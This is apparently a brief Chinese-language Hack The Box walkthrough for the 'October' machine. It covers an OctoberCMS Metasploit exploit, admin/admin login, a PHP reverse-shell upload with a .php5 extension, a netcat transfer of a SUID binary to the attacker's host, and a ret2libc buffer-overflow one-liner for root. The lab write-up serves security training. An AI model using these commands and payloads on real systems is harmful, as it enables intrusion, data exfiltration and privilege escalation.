htb-machines-October

信息收集

端口

网页

网页有写是OctoberCMS，可以查询有无版本漏洞

msf

msf一把梭，找到版本漏洞，并且可以打

虽然可以打，但是这个返回的shell没什么权限，也不能用python再弹个shell，whoami的命令都执行不了，果断放弃，看看文档在哪上传的，自己上传马

getshell

后台路径/backend

管理员弱口令，admin/admin

可以上传一个php反弹shell的文件，改个后缀名php5即可

成功反弹shell，www-data权限

在/home/harry/user.txt中找到user的flag

提权

先获取下pyt

python -c 'import pty; pty.spawn("/bin/bash")'

再把文件pull下来看看

靶机：nc 10.10.14.2 6666 < /usr/local/bin/ovrflw

攻击机：nc -lvnp 6666 > over

缓冲区溢出，具体是啥咱也不懂。。。给pwn👴👴

得到这么个payload，具体可看此链接

while true; do ./ovrflw $(python -c 'print "A"*112 + "\x10\x13\x5e\xb7\x60\x42\x5d\xb7\xac\x3b\x70\xb7"');done

成功